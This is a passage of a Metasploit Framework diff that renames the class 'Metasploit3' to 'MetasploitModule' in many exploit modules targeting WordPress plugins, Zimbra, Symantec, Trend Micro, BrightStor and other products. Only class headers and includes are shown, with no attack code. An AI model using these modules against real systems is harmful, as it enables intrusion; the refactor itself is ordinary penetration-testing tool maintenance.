a/modules/exploits/unix/webapp/wp_downloadmanager_upload.rb +++ b/modules/exploits/unix/webapp/wp_downloadmanager_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HTTP::Wordpress diff --git a/modules/exploits/unix/webapp/wp_easycart_unrestricted_file_upload.rb b/modules/exploits/unix/webapp/wp_easycart_unrestricted_file_upload.rb index 39b948f6d9..714471ec6b 100644 --- a/modules/exploits/unix/webapp/wp_easycart_unrestricted_file_upload.rb +++ b/modules/exploits/unix/webapp/wp_easycart_unrestricted_file_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FileDropper diff --git a/modules/exploits/unix/webapp/wp_foxypress_upload.rb b/modules/exploits/unix/webapp/wp_foxypress_upload.rb index 10b9d39bbd..5b46f5a16a 100644 --- a/modules/exploits/unix/webapp/wp_foxypress_upload.rb +++ b/modules/exploits/unix/webapp/wp_foxypress_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HTTP::Wordpress diff --git a/modules/exploits/unix/webapp/wp_frontend_editor_file_upload.rb b/modules/exploits/unix/webapp/wp_frontend_editor_file_upload.rb index 525d1dfce9..805a886437 100644 --- a/modules/exploits/unix/webapp/wp_frontend_editor_file_upload.rb +++ b/modules/exploits/unix/webapp/wp_frontend_editor_file_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HTTP::Wordpress diff --git a/modules/exploits/unix/webapp/wp_google_document_embedder_exec.rb b/modules/exploits/unix/webapp/wp_google_document_embedder_exec.rb index f7e59f655a..b6e1d7ddc1 100644 --- a/modules/exploits/unix/webapp/wp_google_document_embedder_exec.rb +++ b/modules/exploits/unix/webapp/wp_google_document_embedder_exec.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rbmysql' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/wp_holding_pattern_file_upload.rb b/modules/exploits/unix/webapp/wp_holding_pattern_file_upload.rb index 26b36e5d62..9a77ef8950 100644 --- a/modules/exploits/unix/webapp/wp_holding_pattern_file_upload.rb +++ b/modules/exploits/unix/webapp/wp_holding_pattern_file_upload.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'socket' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FileDropper diff --git a/modules/exploits/unix/webapp/wp_inboundio_marketing_file_upload.rb b/modules/exploits/unix/webapp/wp_inboundio_marketing_file_upload.rb index cacccd0f7d..feae3662d5 100644 --- a/modules/exploits/unix/webapp/wp_inboundio_marketing_file_upload.rb +++ b/modules/exploits/unix/webapp/wp_inboundio_marketing_file_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HTTP::Wordpress diff --git a/modules/exploits/unix/webapp/wp_infusionsoft_upload.rb b/modules/exploits/unix/webapp/wp_infusionsoft_upload.rb index 99deba5747..fd7a419a6c 100644 --- a/modules/exploits/unix/webapp/wp_infusionsoft_upload.rb +++ b/modules/exploits/unix/webapp/wp_infusionsoft_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HTTP::Wordpress diff --git a/modules/exploits/unix/webapp/wp_lastpost_exec.rb b/modules/exploits/unix/webapp/wp_lastpost_exec.rb index f807f9e58c..8f5fc9ba22 100644 --- a/modules/exploits/unix/webapp/wp_lastpost_exec.rb +++ b/modules/exploits/unix/webapp/wp_lastpost_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/unix/webapp/wp_nmediawebsite_file_upload.rb b/modules/exploits/unix/webapp/wp_nmediawebsite_file_upload.rb index 485c58a950..c7027abc93 100644 --- a/modules/exploits/unix/webapp/wp_nmediawebsite_file_upload.rb +++ b/modules/exploits/unix/webapp/wp_nmediawebsite_file_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HTTP::Wordpress diff --git a/modules/exploits/unix/webapp/wp_optimizepress_upload.rb b/modules/exploits/unix/webapp/wp_optimizepress_upload.rb index 2fc0fe33ca..9b10986e87 100644 --- a/modules/exploits/unix/webapp/wp_optimizepress_upload.rb +++ b/modules/exploits/unix/webapp/wp_optimizepress_upload.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'uri' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote include Msf::Exploit::Remote::HTTP::Wordpress include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/wp_photo_gallery_unrestricted_file_upload.rb b/modules/exploits/unix/webapp/wp_photo_gallery_unrestricted_file_upload.rb index cbc7e40b53..941dc8f538 100644 --- a/modules/exploits/unix/webapp/wp_photo_gallery_unrestricted_file_upload.rb +++ b/modules/exploits/unix/webapp/wp_photo_gallery_unrestricted_file_upload.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex/zip' require 'json' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FileDropper diff --git a/modules/exploits/unix/webapp/wp_pixabay_images_upload.rb b/modules/exploits/unix/webapp/wp_pixabay_images_upload.rb index 00226d4e6b..a75eefc24b 100644 --- a/modules/exploits/unix/webapp/wp_pixabay_images_upload.rb +++ b/modules/exploits/unix/webapp/wp_pixabay_images_upload.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote include Msf::Exploit::FileDropper include Msf::Exploit::Remote::HttpServer include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/wp_platform_exec.rb b/modules/exploits/unix/webapp/wp_platform_exec.rb index 2321cede00..d71747cf93 100644 --- a/modules/exploits/unix/webapp/wp_platform_exec.rb +++ b/modules/exploits/unix/webapp/wp_platform_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HTTP::Wordpress diff --git a/modules/exploits/unix/webapp/wp_property_upload_exec.rb b/modules/exploits/unix/webapp/wp_property_upload_exec.rb index 3e83952a77..be24e09124 100644 --- a/modules/exploits/unix/webapp/wp_property_upload_exec.rb +++ b/modules/exploits/unix/webapp/wp_property_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HTTP::Wordpress diff --git a/modules/exploits/unix/webapp/wp_reflexgallery_file_upload.rb b/modules/exploits/unix/webapp/wp_reflexgallery_file_upload.rb index 564aaead50..7590f4caef 100644 --- a/modules/exploits/unix/webapp/wp_reflexgallery_file_upload.rb +++ b/modules/exploits/unix/webapp/wp_reflexgallery_file_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HTTP::Wordpress diff --git a/modules/exploits/unix/webapp/wp_revslider_upload_execute.rb b/modules/exploits/unix/webapp/wp_revslider_upload_execute.rb index 5e229750e1..c79b3069df 100644 --- a/modules/exploits/unix/webapp/wp_revslider_upload_execute.rb +++ b/modules/exploits/unix/webapp/wp_revslider_upload_execute.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking diff --git a/modules/exploits/unix/webapp/wp_slideshowgallery_upload.rb b/modules/exploits/unix/webapp/wp_slideshowgallery_upload.rb index 830cb7cea6..b6d53feb0a 100644 --- a/modules/exploits/unix/webapp/wp_slideshowgallery_upload.rb +++ b/modules/exploits/unix/webapp/wp_slideshowgallery_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HTTP::Wordpress diff --git a/modules/exploits/unix/webapp/wp_symposium_shell_upload.rb b/modules/exploits/unix/webapp/wp_symposium_shell_upload.rb index 6b7a2c30b9..620594fc2f 100644 --- a/modules/exploits/unix/webapp/wp_symposium_shell_upload.rb +++ b/modules/exploits/unix/webapp/wp_symposium_shell_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FileDropper diff --git a/modules/exploits/unix/webapp/wp_total_cache_exec.rb b/modules/exploits/unix/webapp/wp_total_cache_exec.rb index bcf6911d2b..8380660362 100644 --- a/modules/exploits/unix/webapp/wp_total_cache_exec.rb +++ b/modules/exploits/unix/webapp/wp_total_cache_exec.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote include Msf::Exploit::Remote::HTTP::Wordpress include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/wp_worktheflow_upload.rb b/modules/exploits/unix/webapp/wp_worktheflow_upload.rb index ff0f1b3644..975d7d004a 100644 --- a/modules/exploits/unix/webapp/wp_worktheflow_upload.rb +++ b/modules/exploits/unix/webapp/wp_worktheflow_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HTTP::Wordpress diff --git a/modules/exploits/unix/webapp/wp_wpshop_ecommerce_file_upload.rb b/modules/exploits/unix/webapp/wp_wpshop_ecommerce_file_upload.rb index f4cd2947c3..bcf004dac6 100644 --- a/modules/exploits/unix/webapp/wp_wpshop_ecommerce_file_upload.rb +++ b/modules/exploits/unix/webapp/wp_wpshop_ecommerce_file_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HTTP::Wordpress diff --git a/modules/exploits/unix/webapp/wp_wptouch_file_upload.rb b/modules/exploits/unix/webapp/wp_wptouch_file_upload.rb index b9077a1de7..4e73bdf79d 100644 --- a/modules/exploits/unix/webapp/wp_wptouch_file_upload.rb +++ b/modules/exploits/unix/webapp/wp_wptouch_file_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HTTP::Wordpress diff --git a/modules/exploits/unix/webapp/wp_wysija_newsletters_upload.rb b/modules/exploits/unix/webapp/wp_wysija_newsletters_upload.rb index e12dd578c5..4e4ab2070c 100644 --- a/modules/exploits/unix/webapp/wp_wysija_newsletters_upload.rb +++ b/modules/exploits/unix/webapp/wp_wysija_newsletters_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HTTP::Wordpress diff --git a/modules/exploits/unix/webapp/xoda_file_upload.rb b/modules/exploits/unix/webapp/xoda_file_upload.rb index 1a4f6f9ab5..5877144ba3 100644 --- a/modules/exploits/unix/webapp/xoda_file_upload.rb +++ b/modules/exploits/unix/webapp/xoda_file_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/zeroshell_exec.rb b/modules/exploits/unix/webapp/zeroshell_exec.rb index 6af43f873a..2e6345440a 100644 --- a/modules/exploits/unix/webapp/zeroshell_exec.rb +++ b/modules/exploits/unix/webapp/zeroshell_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/zimbra_lfi.rb b/modules/exploits/unix/webapp/zimbra_lfi.rb index 0cb88957e1..c11f84545f 100644 --- a/modules/exploits/unix/webapp/zimbra_lfi.rb +++ b/modules/exploits/unix/webapp/zimbra_lfi.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rexml/document' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpClient include Msf::Exploit::EXE diff --git a/modules/exploits/unix/webapp/zoneminder_packagecontrol_exec.rb b/modules/exploits/unix/webapp/zoneminder_packagecontrol_exec.rb index 8f26104b4e..e1ff8e7aa0 100644 --- a/modules/exploits/unix/webapp/zoneminder_packagecontrol_exec.rb +++ b/modules/exploits/unix/webapp/zoneminder_packagecontrol_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/zpanel_username_exec.rb b/modules/exploits/unix/webapp/zpanel_username_exec.rb index fa69d395d3..d087d53acc 100644 --- a/modules/exploits/unix/webapp/zpanel_username_exec.rb +++ b/modules/exploits/unix/webapp/zpanel_username_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/x11/x11_keyboard_exec.rb b/modules/exploits/unix/x11/x11_keyboard_exec.rb index 00ba8cad4b..3b07a8c264 100644 --- a/modules/exploits/unix/x11/x11_keyboard_exec.rb +++ b/modules/exploits/unix/x11/x11_keyboard_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/antivirus/ams_hndlrsvc.rb b/modules/exploits/windows/antivirus/ams_hndlrsvc.rb index efed29d6fa..3e925831b0 100644 --- a/modules/exploits/windows/antivirus/ams_hndlrsvc.rb +++ b/modules/exploits/windows/antivirus/ams_hndlrsvc.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking diff --git a/modules/exploits/windows/antivirus/ams_xfr.rb b/modules/exploits/windows/antivirus/ams_xfr.rb index 7088c01e04..9496760df7 100644 --- a/modules/exploits/windows/antivirus/ams_xfr.rb +++ b/modules/exploits/windows/antivirus/ams_xfr.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking diff --git a/modules/exploits/windows/antivirus/symantec_endpoint_manager_rce.rb b/modules/exploits/windows/antivirus/symantec_endpoint_manager_rce.rb index 376be876bb..1f62f84c1e 100644 --- a/modules/exploits/windows/antivirus/symantec_endpoint_manager_rce.rb +++ b/modules/exploits/windows/antivirus/symantec_endpoint_manager_rce.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/exploit/powershell' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include REXML diff --git a/modules/exploits/windows/antivirus/symantec_iao.rb b/modules/exploits/windows/antivirus/symantec_iao.rb index 48b9a23fb3..e1ae91de8e 100644 --- a/modules/exploits/windows/antivirus/symantec_iao.rb +++ b/modules/exploits/windows/antivirus/symantec_iao.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/antivirus/symantec_rtvscan.rb b/modules/exploits/windows/antivirus/symantec_rtvscan.rb index d766eb6294..1e464e7b5d 100644 --- a/modules/exploits/windows/antivirus/symantec_rtvscan.rb +++ b/modules/exploits/windows/antivirus/symantec_rtvscan.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/antivirus/symantec_workspace_streaming_exec.rb b/modules/exploits/windows/antivirus/symantec_workspace_streaming_exec.rb index 5822a09417..1100693c5a 100644 --- a/modules/exploits/windows/antivirus/symantec_workspace_streaming_exec.rb +++ b/modules/exploits/windows/antivirus/symantec_workspace_streaming_exec.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rexml/document' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/antivirus/trendmicro_serverprotect.rb b/modules/exploits/windows/antivirus/trendmicro_serverprotect.rb index 96d629dcf2..78276f632f 100644 --- a/modules/exploits/windows/antivirus/trendmicro_serverprotect.rb +++ b/modules/exploits/windows/antivirus/trendmicro_serverprotect.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::DCERPC diff --git a/modules/exploits/windows/antivirus/trendmicro_serverprotect_createbinding.rb b/modules/exploits/windows/antivirus/trendmicro_serverprotect_createbinding.rb index 026513e734..f85e5a0d20 100644 --- a/modules/exploits/windows/antivirus/trendmicro_serverprotect_createbinding.rb +++ b/modules/exploits/windows/antivirus/trendmicro_serverprotect_createbinding.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::DCERPC diff --git a/modules/exploits/windows/antivirus/trendmicro_serverprotect_earthagent.rb b/modules/exploits/windows/antivirus/trendmicro_serverprotect_earthagent.rb index ef09da8928..aab4bbef64 100644 --- a/modules/exploits/windows/antivirus/trendmicro_serverprotect_earthagent.rb +++ b/modules/exploits/windows/antivirus/trendmicro_serverprotect_earthagent.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::DCERPC diff --git a/modules/exploits/windows/arkeia/type77.rb b/modules/exploits/windows/arkeia/type77.rb index d1c08fd8c3..c4ef38be85 100644 --- a/modules/exploits/windows/arkeia/type77.rb +++ b/modules/exploits/windows/arkeia/type77.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Arkeia diff --git a/modules/exploits/windows/backdoor/energizer_duo_payload.rb b/modules/exploits/windows/backdoor/energizer_duo_payload.rb index a6eb07f123..6b1392a2b6 100644 --- a/modules/exploits/windows/backdoor/energizer_duo_payload.rb +++ b/modules/exploits/windows/backdoor/energizer_duo_payload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/backupexec/name_service.rb b/modules/exploits/windows/backupexec/name_service.rb index 8670ef8c98..f67e8af3b3 100644 --- a/modules/exploits/windows/backupexec/name_service.rb +++ b/modules/exploits/windows/backupexec/name_service.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/backupexec/remote_agent.rb b/modules/exploits/windows/backupexec/remote_agent.rb index 13431a8ea1..85ca160d70 100644 --- a/modules/exploits/windows/backupexec/remote_agent.rb +++ b/modules/exploits/windows/backupexec/remote_agent.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::NDMP diff --git a/modules/exploits/windows/brightstor/ca_arcserve_342.rb b/modules/exploits/windows/brightstor/ca_arcserve_342.rb index 0ac6087379..9c34ac5621 100644 --- a/modules/exploits/windows/brightstor/ca_arcserve_342.rb +++ b/modules/exploits/windows/brightstor/ca_arcserve_342.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::DCERPC diff --git a/modules/exploits/windows/brightstor/discovery_tcp.rb b/modules/exploits/windows/brightstor/discovery_tcp.rb index 8145935ad9..c2c7d89872 100644 --- a/modules/exploits/windows/brightstor/discovery_tcp.rb +++ b/modules/exploits/windows/brightstor/discovery_tcp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/brightstor/discovery_udp.rb b/modules/exploits/windows/brightstor/discovery_udp.rb index bfe484f24f..1a8a8d5885 100644 --- a/modules/exploits/windows/brightstor/discovery_udp.rb +++ b/modules/exploits/windows/brightstor/discovery_udp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/brightstor/etrust_itm_alert.rb b/modules/exploits/windows/brightstor/etrust_itm_alert.rb index 61ae466927..5947954bba 100644 --- a/modules/exploits/windows/brightstor/etrust_itm_alert.rb +++ b/modules/exploits/windows/brightstor/etrust_itm_alert.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::DCERPC diff --git a/modules/exploits/windows/brightstor/hsmserver.rb b/modules/exploits/windows/brightstor/hsmserver.rb index ade7cf8ecf..a23793e2e1 100644 --- a/modules/exploits/windows/brightstor/hsmserver.rb +++ b/modules/exploits/windows/brightstor/hsmserver.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/brightstor/lgserver.rb b/modules/exploits/windows/brightstor/lgserver.rb index d439f85cc8..11017fc1d8 100644 --- a/modules/exploits/windows/brightstor/lgserver.rb +++ b/modules/exploits/windows/brightstor/lgserver.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/brightstor/lgserver_multi.rb b/modules/exploits/windows/brightstor/lgserver_multi.rb index 6f6bda88cd..6aadbd1579 100644 --- a/modules/exploits/windows/brightstor/lgserver_multi.rb +++ b/modules/exploits/windows/brightstor/lgserver_multi.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking diff --git a/modules/exploits/windows/brightstor/lgserver_rxrlogin.rb b/modules/exploits/windows/brightstor/lgserver_rxrlogin.rb index a54686a117..307a6d1eb0 100644 --- a/modules/exploits/windows/brightstor/lgserver_rxrlogin.rb +++ b/modules/exploits/windows/brightstor/lgserver_rxrlogin.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/brightstor/lgserver_rxssetdatagrowthscheduleandfilter.rb b/modules/exploits/windows/brightstor/lgserver_rxssetdatagrowthscheduleandfilter.rb index bbbd6376ee..9af29f1237 100644 --- a/modules/exploits/windows/brightstor/lgserver_rxssetdatagrowthscheduleandfilter.rb +++ b/modules/exploits/windows/brightstor/lgserver_rxssetdatagrowthscheduleandfilter.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking diff --git a/modules/exploits/windows/brightstor/lgserver_rxsuselicenseini.rb b/modules/exploits/windows/brightstor/lgserver_rxsuselicenseini.rb index e12c6efa64..8f464578f1 100644 --- a/modules/exploits/windows/brightstor/lgserver_rxsuselicenseini.rb +++ b/modules/exploits/windows/brightstor/lgserver_rxsuselicenseini.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/brightstor/license_gcr.rb b/modules/exploits/windows/brightstor/license_gcr.rb index 53b03d3d27..2e6634ae61 100644 --- a/modules/exploits/windows/brightstor/license_gcr.rb +++ b/modules/exploits/windows/brightstor/license_gcr.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/brightstor/mediasrv_sunrpc.rb b/modules/exploits/windows/brightstor/mediasrv_sunrpc.rb index 6ea0c62537..f6a5fc70d8 100644 --- a/modules/exploits/windows/brightstor/mediasrv_sunrpc.rb +++ b/modules/exploits/windows/brightstor/mediasrv_sunrpc.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::SunRPC diff --git a/modules/exploits/windows/brightstor/message_engine.rb b/modules/exploits/windows/brightstor/message_engine.rb index af04cc4bf8..5f8c82ef4f 100644 --- a/modules/exploits/windows/brightstor/message_engine.rb +++ b/modules/exploits/windows/brightstor/message_engine.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::DCERPC diff --git a/modules/exploits/windows/brightstor/message_engine_72.rb b/modules/exploits/windows/brightstor/message_engine_72.rb index f4ca613159..377f36c163 100644 --- a/modules/exploits/windows/brightstor/message_engine_72.rb +++ b/modules/exploits/windows/brightstor/message_engine_72.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking diff --git a/modules/exploits/windows/brightstor/message_engine_heap.rb b/modules/exploits/windows/brightstor/message_engine_heap.rb index 5ba4ca46fb..0fe296dcb1 100644 --- a/modules/exploits/windows/brightstor/message_engine_heap.rb +++ b/modules/exploits/windows/brightstor/message_engine_heap.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::DCERPC diff --git a/modules/exploits/windows/brightstor/sql_agent.rb b/modules/exploits/windows/brightstor/sql_agent.rb index 2785745edc..6c485b64f0 100644 --- a/modules/exploits/windows/brightstor/sql_agent.rb +++ b/modules/exploits/windows/brightstor/sql_agent.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/brightstor/tape_engine.rb b/modules/exploits/windows/brightstor/tape_engine.rb index dc9da31f15..46702d30fd 100644 --- a/modules/exploits/windows/brightstor/tape_engine.rb +++ b/modules/exploits/windows/brightstor/tape_engine.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::DCERPC diff --git a/modules/exploits/windows/brightstor/tape_engine_0x8a.rb b/modules/exploits/windows/brightstor/tape_engine_0x8a.rb index 6e55ba95b3..36c01eb3c3 100644 --- a/modules/exploits/windows/brightstor/tape_engine_0x8a.rb +++ b/modules/exploits/windows/brightstor/tape_engine_0x8a.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < 